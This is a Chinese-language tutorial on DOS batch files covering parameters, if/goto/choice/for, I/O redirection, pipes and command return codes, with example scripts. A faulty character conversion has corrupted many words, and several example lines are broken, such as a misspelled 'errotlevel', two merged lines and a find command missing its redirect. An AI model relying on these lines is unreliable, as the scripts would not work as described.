例1：用edit編輯a.bat文件，輸入下列內容後存盤爲c:\a.bat，執行該批處理文件後可實現：將根目錄中全部文件寫入 a.txt中，啓動UCDOS，進入WPS等功能。

　　批處理文件的內容爲: 　　　　　　　 命令註釋：

　　　　@echo off　　　　　　　　　　　不顯示後續命令行及當前命令行
　　　　dir c:\*.* >a.txt　　　　　　　將c盤文件列表寫入a.txt
　　　　call c:\ucdos\ucdos.bat　　　　調用ucdos
　　　　echo 你好 　　　　　　　　　　 顯示"你好"
　　　　pause 　　　　　　　　　　　　 暫停,等待按鍵繼續
　　　　rem 準備運行wps 　　　　　　　 註釋：準備運行wps
　　　　cd ucdos　　　　　　　　　　　 進入ucdos目錄
　　　　wps 　　　　　　　　　　　　　 運行wps　　

批處理文件的參數

批處理文件還能夠像C語言的函數同樣使用參數（至關於DOS命令的命令行參數），這須要用到一個參數表示符「%」。

%[1-9]表示參數，參數是指在運行批處理文件時在文件名後加的以空格（或者Tab）分隔的字符串。變量能夠從%0到%9，%0表示批處理命令自己，其它參數字符串用%1到%9順序表示。

例2：C:根目錄下有一批處理文件名爲f.bat，內容爲：
@echo off
format %1

若是執行C:\>f a:
那麼在執行f.bat時，%1就表示a:，這樣format %1就至關於format a:，因而上面的命令運行時實際執行的是format a:

例3：C:根目錄下一批處理文件名爲t.bat，內容爲:
@echo off
type %1
type %2

那麼運行C:\>t a.txt b.txt
%1 : 表示a.txt
%2 : 表示b.txt
因而上面的命令將順序地顯示a.txt和b.txt文件的內容。


特殊命令

if goto choice for是批處理文件中比較高級的命令。

if 

是條件語句，用來判斷是否符合規定的條件，從而決定執行不一樣的命令。 有三種格式:

if [not] "參數" == "字符串" 待執行的命令

參數若是等於(not表示不等，下同)指定的字符串，則條件成立，運行命令，不然運行下一句。

例：if "%1"=="a" format a:

if [not] exist [路徑\]文件名 待執行的命令
若是有指定的文件，則條件成立，運行命令，不然運行下一句。

如: if exist c:\config.sys type c:\config.sys
表示若是存在c:\config.sys文件，則顯示它的內容。

if errorlevel <數字> 待執行的命令

不少DOS程序在運行結束後會返回一個數字值用來表示程序運行的結果(或者狀態)，經過if
 
errorlevel命令能夠判斷程序的返回值，根據不一樣的返回值來決定執行不一樣的命令(返回值必須按照從大到小的順序排列)。若是返回值等於指定的數
字，則條件成立，運行命令，不然運行下一句。

如if errorlevel 2 goto x2

goto 

批處理文件運行到這裏將跳到goto所指定的標號(標號即label，標號用:後跟標準字符串來定義)處，goto語句通常與if配合使用，根據不一樣的條件來執行不一樣的命令組。

如:

goto end

:end
echo this is the end

標號用「:字符串」來定義，標號所在行不被執行。

choice 

使用此命令可讓用戶輸入一個字符（用於選擇），從而根據用戶的選擇返回不一樣的errorlevel，而後於if errorlevel配合，根據用戶的選擇運行不一樣的命令。

注意：choice命令爲DOS或者Windows系統提供的外部命令，不一樣版本的choice命令語法會稍有不一樣，請用choice /?查看用法。

choice的命令語法（該語法爲Windows 2003中choice命令的語法，其它版本的choice的命令語法與此大同小異）：

CHOICE [/C choices] [/N] [/CS] [/T timeout /D choice] [/M text]

描述:
該工具容許用戶從選擇列表選擇一個項目並返回所選項目的索引。

參數列表:
/C choices 指定要建立的選項列表。默認列表是 "YN"。

/N 在提示符中隱藏選項列表。提示前面的消息獲得顯示，
選項依舊處於啓用狀態。

/CS 容許選擇分大小寫的選項。在默認狀況下，這個工具
是不分大小寫的。

/T timeout 作出默認選擇以前，暫停的秒數。可接受的值是從 0
到 9999。若是指定了 0，就不會有暫停，默認選項
會獲得選擇。

/D choice 在 nnnn 秒以後指定默認選項。字符必須在用 /C 選
項指定的一組選擇中; 同時，必須用 /T 指定 nnnn。

/M text 指定提示以前要顯示的消息。若是沒有指定，工具只
顯示提示。

/? 顯示幫助消息。

注意:
ERRORLEVEL 環境變量被設置爲從選擇集選擇的鍵索引。列出的第一個選
擇返回 1，第二個選擇返回 2，等等。若是用戶按的鍵不是有效的選擇，
該工具會發出警告響聲。若是該工具檢測到錯誤狀態，它會返回 255 的
ERRORLEVEL 值。若是用戶按 Ctrl+Break 或 Ctrl+C 鍵，該工具會返回 0
的 ERRORLEVEL 值。在一個批程序中使用 ERRORLEVEL 參數時，將參數降
序排列。

示例:
CHOICE /?
CHOICE /C YNC /M "確認請按 Y，否請按 N，或者取消請按 C。"
CHOICE /T 10 /C ync /CS /D y
CHOICE /C ab /M "選項 1 請選擇 a，選項 2 請選擇 b。"
CHOICE /C ab /N /M "選項 1 請選擇 a，選項 2 請選擇 b。"

若是我運行命令：CHOICE /C YNC /M "確認請按 Y，否請按 N，或者取消請按 C。"
屏幕上會顯示：
確認請按 Y，否請按 N，或者取消請按 C。 [Y,N,C]?


例：test.bat的內容以下（注意，用if errorlevel判斷返回值時，要按返回值從高到低排列）:
@echo off
choice /C dme /M "defrag,mem,end"
if errorlevel 3 goto end
if errorlevel 2 goto mem
if errotlevel 1 goto defrag

:defrag
c:\dos\defrag
goto end

:mem
mem
goto end

:end
echo good bye

此批處理運行後，將顯示「defrag,mem,end[D,M,E]?」 ，用戶可選擇d m e 
，而後if語句根據用戶的選擇做出判斷，d表示執行標號爲defrag的程序段，m表示執行標號爲mem的程序段，e表示執行標號爲end的程序段，每一個
程序段最後都以goto end將程序跳到end標號處，而後程序將顯示good bye，批處理運行結束。

for 循環命令，只要條件符合，它將屢次執行同一命令。

語法：
對一組文件中的每個文件執行某個特定命令。

FOR %%variable IN (set) DO command [command-parameters]

%%variable 指定一個單一字母可替換的參數。
(set) 指定一個或一組文件。可使用通配符。
command 指定對每一個文件執行的命令。
command-parameters
爲特定命令指定參數或命令行開關。

例如一個批處理文件中有一行:
for %%c in (*.bat *.txt) do type %%c

則該命令行會顯示當前目錄下全部以bat和txt爲擴展名的文件的內容。



重定向操做


可使用重定向操做符將命令輸入和輸出數據流從默認位置重定向到其餘位置。輸入或輸出數據流的位置稱爲句柄。
下表將列出可用的句柄。
句柄    句柄的數字代號    描述    
STDIN    0    鍵盤輸入    
STDOUT    1    輸出到命令提示符窗口    
STDERR    2    錯誤輸出到命令提示符窗口    
UNDEFINED    3-9    句柄由應用程序單獨定義，它們是各個工具特有的    
數字 0 到 9 表明前 10 個句柄。可使用命令 Cmd.exe 運行程序，並對該程序前 10 
個句柄中的任何一個句柄進行重定向。要指定要用的句柄，在重定向操做符以前鍵入該句柄的數字。若是未定義句柄，則默認的 < 重定向輸入操做符是 
0，而默認的 > 重定向輸出操做符是 1。鍵入 < 或 > 
操做符以後，必須指定數據的讀寫位置。能夠指定文件名或其餘現有的句柄。
要指定重定向到現有句柄，請使用與 (&) 字符，後面接要重定向的句柄號（即 &句柄號）。例如，下面的命令能夠將句柄 2（即 STDERR）重定向到句柄 1（即 STDOUT）：
2>&1


重定向輸入"<"
要經過鍵盤將輸入重定向到文件或設備，使用 "< "操做符。
例如，要從 File.txt 獲取 sort 命令的輸入，鍵入：
sort<file.txt
File.txt 的內容將以字母順序列表的方式顯示在命令提示符窗口中。
"< "操做符能夠打開具備只讀訪問權限的指定文件名。所以，不能在使用該操做符時向文件中寫入信息。例如，若是以 <&2 啓動程序，則全部試圖讀取句柄 0 的操做都將失敗，由於句柄 2 最初是以只寫訪問方式打開的。
注意
•    0 是 < 重定向輸入操做符的默認句柄。    
重定向輸出">"

幾乎全部的命令都將輸出發送到命令提示符窗口。即便將輸出發送到驅動器或打印機的命令也會在命令提示符窗口顯示消息和提示。
要將輸出從命令提示符窗口重定向到文件或設備，使用 > 操做符。能夠在許多命令中使用該操做符
例如，要將 dir 輸出重定向到 Dirlist.txt，鍵入：
dir>dirlist.txt
若是 Dirlist.txt 不存在，Cmd.exe 將建立該文件。若是 Dirlist.txt 存在，Cmd.exe 將使用 dir 命令的輸出替換文件中的信息。
要運行 netsh routing dump 命令，而後將輸出發送到 Route.cfg，鍵入：
netsh routing dump>c:\route.cfg
">" 操做符能夠打開具備只寫訪問權限的指定文件。所以，不能使用該操做符讀取文件。例如，若是使用重定向操做符 >&0 啓動程序，則寫入句柄 1 的全部嘗試操做都將失敗，由於句柄 0 最初是以只讀訪問方式打開的。
注意
•    1 是 > 重定向輸出操做符的默認句柄。    
複製句柄

重定向操做符" & "能夠將輸出或輸入從一個指定句柄複製到另外一個指定的句柄。
例如，要將 dir 輸出發送到 File.txt 並將錯誤輸出發送到 File.txt，鍵入：
dir>c:\file.txt 2>&1
複製句柄時，能夠複製該句柄原狀態的全部特性。例如，若是一個句柄具備只讀訪問的屬性，則該句柄的全部副本都具備只讀訪問屬性。不能將一個具備只讀訪問屬性的句柄複製到另外一個具備只寫訪問屬性的句柄。
使用"&"操做符重定向輸出和副本

要將重定向輸入操做符 "<" 與複製操做符 "&" 結合使用，指定的文件必須已經存在。若是輸入文件存在，Cmd.exe 
將以只讀方式打開該文件，而後將文件包含的字符做爲輸入發送到此命令（如同從鍵盤輸入同樣）。若是指定了句柄，Cmd.exe 
將指定的句柄複製到系統現有的句柄中。
例如，要以句柄 0 輸入讀取（即 STDIN）的方式打開 File.txt，鍵入：
< file.txt
要打開 File.txt，並在內容排序後將輸出發送到命令提示符窗口（即 STDOUT），鍵入：
sort< file.txt
要查找 File.txt，而後將句柄 1（即 STDOUT）和句柄 2（即 STDERR）重定向到 Search.txt，鍵入：
findfile file.txt>search.txt 2<&1
要以句柄 0 輸入讀取（即 STDIN）的方式複製用戶定義的句柄 3，鍵入：
<&3
使用"&"操做符重定向輸出和複製

若是將輸出重定向到文件且指定了現有的文件名，Cmd.exe 將以只寫方式打開文件並覆蓋該文件內容。若是指定了句柄，Cmd.exe 將文件複製到現有句柄中。
要將用戶定義的句柄 3 複製到句柄 1，鍵入：
>&3
要將包括句柄 2（即 STDERR）的全部輸出從 ipconfig 命令重定向到句柄 1（即 STDOUT），而後將輸出重定向到 Output.log，鍵入：
ipconfig.exe>>output.log 2>&1
使用">>"重定向操做符附加輸出

要從命令中將輸出添加到文件末尾而不丟失文件中已存在的任何信息，請使用兩個連續的大於號（即 >>）。
例如，使用下列命令能夠將 dir 命令生成的目錄列表附加到 Dirlist.txt 文件：
dir>>dirlist.txt
要將 netstat 命令的輸出附加到 Tcpinfo.txt 的末尾，鍵入：
netstat>>tcpinfo.txt
使用管道操做符"|"

管道操做符 (|) 能夠提取一個命令的輸出（默認狀況下是 STDOUT），而後將其定向到另外一個命令的輸入（默認狀況下是 STDIN）中。
例如，使用下面的命令能夠對目錄進行分類：
dir | sort
在本例中，將同時啓動兩個命令，但隨後 sort 命令會暫停，直到它接收到 dir 命令的輸出爲止。sort 命令使用 dir 命令的輸出做爲輸入，而後將輸出發送到句柄 1（即 STDOUT）。
合併帶重定向操做符的命令

經過合併帶有其餘命令和文件名的篩選器命令，能夠建立自定義命令。
例如，可使用如下命令存儲包含「LOG」字符串的文件名:
dir /b | find "log" loglist.txt
dir 命令的輸出是經過 find 篩選器命令進行發送的。包含字符串「LOG」的文件名做爲文件名列表（例如，NetshConfig.log、Logdat.svd 和 Mylog.bat）存儲在文件 Loglist.txt 中。
要在相同命令中使用多個篩選器，使用管道 (|) 分隔篩選器。
例如，下面的命令將搜索 C 盤上的每一個目錄以查找包含「LOG」字符串的文件名，而且在命令提示符窗口中每次顯示一屏：
dir c:\ /s /b | find "log" | more



批處理示例

IF-EXIST

1)

首先用記事本在C:\創建一個test1.bat批處理文件，文件內容以下：
@echo off
IF EXIST \AUTOEXEC.BAT TYPE \AUTOEXEC.BAT
IF NOT EXIST \AUTOEXEC.BAT ECHO \AUTOEXEC.BAT does not exist

而後運行它：
C:\>TEST1.BAT

若是C:\存在AUTOEXEC.BAT文件，那麼它的內容就會被顯示出來，若是不存在，批處理就會提示你該文件不存在。

2)

接着再創建一個test2.bat文件，內容以下：
@ECHO OFF
IF EXIST \%1 TYPE \%1
IF NOT EXIST \%1 ECHO \%1 does not exist

執行:
C:\>TEST2 AUTOEXEC.BAT
該命令運行結果同上。

說明：
(1) IF EXIST 是用來測試文件是否存在的，格式爲
IF EXIST [路徑+文件名] 命令
(2) test2.bat文件中的%1是參數，DOS容許傳遞9個批參數信息給批處理文件，分別爲%1~%9(%0表示test2命令自己) ，這有點象編程中的實參和形參的關係，%1是形參，AUTOEXEC.BAT是實參。

3) 更進一步的，創建一個名爲TEST3.BAT的文件，內容以下：
@echo off
IF "%1" == "A" ECHO XIAO
IF "%2" == "B" ECHO TIAN
IF "%3" == "C" ECHO XIN

若是運行：
C:\>TEST3 A B C
屏幕上會顯示:
XIAO
TIAN
XIN

若是運行：
C:\>TEST3 A B
屏幕上會顯示
XIAO
TIAN

在這個命令執行過程當中，DOS會將一個空字符串指定給參數%3。

IF-ERRORLEVEL

創建TEST4.BAT，內容以下：
@ECHO OFF
XCOPY C:\AUTOEXEC.BAT D:IF ERRORLEVEL 1 ECHO 文件拷貝失敗
IF ERRORLEVEL 0 ECHO 成功拷貝文件

而後執行文件:
C:\>TEST4

若是文件拷貝成功，屏幕就會顯示「成功拷貝文件」，不然就會顯示「文件拷貝失敗」。

IF ERRORLEVEL 是用來測試它的上一個DOS命令的返回值的，注意只是上一個命令的返回值，並且返回值必須依照從大到小次序順序判斷。
所以下面的批處理文件是錯誤的：
@ECHO OFF
XCOPY C:\AUTOEXEC.BAT D:\
IF ERRORLEVEL 0 ECHO 成功拷貝文件
IF ERRORLEVEL 1 ECHO 未找到拷貝文件
IF ERRORLEVEL 2 ECHO 用戶經過ctrl-c停止拷貝操做
IF ERRORLEVEL 3 ECHO 預置錯誤阻止文件拷貝操做
IF ERRORLEVEL 4 ECHO 拷貝過程當中寫盤錯誤

不管拷貝是否成功，後面的：

未找到拷貝文件
用戶經過ctrl-c停止拷貝操做
預置錯誤阻止文件拷貝操做
拷貝過程當中寫盤錯誤

都將顯示出來。

如下就是幾個經常使用命令的返回值及其表明的意義：
backup
0 備份成功
1 未找到備份文件
2 文件共享衝突阻止備份完成
3 用戶用ctrl-c停止備份
4 因爲致命的錯誤使備份操做停止

diskcomp
0 盤比較相同
1 盤比較不一樣
2 用戶經過ctrl-c停止比較操做
3 因爲致命的錯誤使比較操做停止
4 預置錯誤停止比較

diskcopy
0 盤拷貝操做成功
1 非致命盤讀/寫錯
2 用戶經過ctrl-c結束拷貝操做
3 因致命的處理錯誤使盤拷貝停止
4 預置錯誤阻止拷貝操做

format
0 格式化成功
3 用戶經過ctrl-c停止格式化處理
4 因致命的處理錯誤使格式化停止
5 在提示「proceed with format（y/n）?」下用戶鍵入n結束

xcopy
0 成功拷貝文件
1 未找到拷貝文件
2 用戶經過ctrl-c停止拷貝操做
4 預置錯誤阻止文件拷貝操做
5 拷貝過程當中寫盤錯誤

IF STRING1 == STRING2

創建TEST5.BAT，文件內容以下：
@echo off
IF "%1" == "A" formAT A:

執行：
C:\>TEST5 A
屏幕上就出現是否將A:盤格式化的內容。

注意：爲了防止參數爲空的狀況，通常會將字符串用雙引號（或者其它符號，注意不能使用保留符號）括起來。
如：if [%1]==[A] 或者 if %1*==A*

GOTO

創建TEST6.BAT，文件內容以下：
@ECHO OFF
IF EXIST C:\AUTOEXEC.BAT GOTO _COPY
GOTO _DONE
:_COPY
COPY C:\AUTOEXEC.BAT D:\
:_DONE

注意：
(1) 標號前是ASCII字符的冒號":"，冒號與標號之間不能有空格。
(2) 標號的命名規則與文件名的命名規則相同。
(3) DOS支持最長八位字符的標號，當沒法區別兩個標號時，將跳轉至最近的一個標號。

FOR

創建C:\TEST7.BAT，文件內容以下：
@ECHO OFF
FOR %C IN (*.BAT *.TXT *.SYS) DO TYPE %C

運行：
C:>TEST7

執行之後，屏幕上會將C:盤根目錄下全部以BAT、TXT、SYS爲擴展名的文件內容顯示出來（不包括隱藏文件).